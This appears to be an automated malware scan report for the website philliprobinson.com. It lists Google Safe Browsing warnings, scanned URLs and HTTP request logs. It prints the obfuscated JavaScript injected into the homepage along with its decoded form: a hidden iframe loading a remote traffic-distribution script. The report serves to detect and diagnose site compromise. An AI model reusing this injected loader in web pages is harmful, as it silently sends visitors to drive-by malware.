Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=philliprobinson.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://philliprobinson.com/ | 200 OK Content-Length: 757 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v5184b2bf46b2e(v5184b2bf46b84){ return(parseInt(v5184b2bf46b84,16));}function v5184b2bf46c83(v5184b2bf46cc8){ function v5184b2bf46dd1 () {var v5184b2bf46e1a=2; return v5184b2bf46e1a;} var v5184b2bf46d09='';for(v5184b2bf46d4b=0; v5184b2bf46d4b<v5184b2bf46cc8.length; v5184b2bf46d4b+=v5184b2bf46dd1()){ v5184b2bf46d09+=(String.fromCharCode(v5184b2bf46b2e(v5184b2bf46cc8.substr(v5184b2bf46d4b, v5184b2bf46dd1()))));}return v5184b2bf46d09;} document.write(v5184b2bf46c83('3C696672616D65206E616D653D2732366535346527207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D343230206865696768743D343339207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='26e54e' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=420 height=439 style='display:none'></iframe> Antivirus reports:
| ||
http://philliprobinson.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 06 Oct 2014 17:06:29 GMT Location: http://cyclevasion.be/tinymce/examples/upy.php Server: Apache Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://cyclevasion.be/tinymce/examples/upy.php | 500 Can't connect to cyclevasion.be:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
http://cyclevasion.be/test404page.js | 500 Can't connect to cyclevasion.be:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: philliprobinson.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 17:06:28 GMT
Accept-Ranges: bytes
ETag: "31f8743-2f5-4dbdf10917240"
Server: Apache
Content-Length: 757
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 07:03:29 GMT
...757 bytes of data.
GET / HTTP/1.1
Host: philliprobinson.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 17:06:28 GMT
Accept-Ranges: bytes
ETag: "31f8743-2f5-4dbdf10917240"
Server: Apache
Content-Length: 757
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 07:03:29 GMT
...757 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: philliprobinson.com
Referer: http://www.google.com/search?q=philliprobinson.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: philliprobinson.com
Referer: http://www.google.com/search?q=philliprobinson.com
Result:
The result is similar to the first query. There are no suspicious redirects found.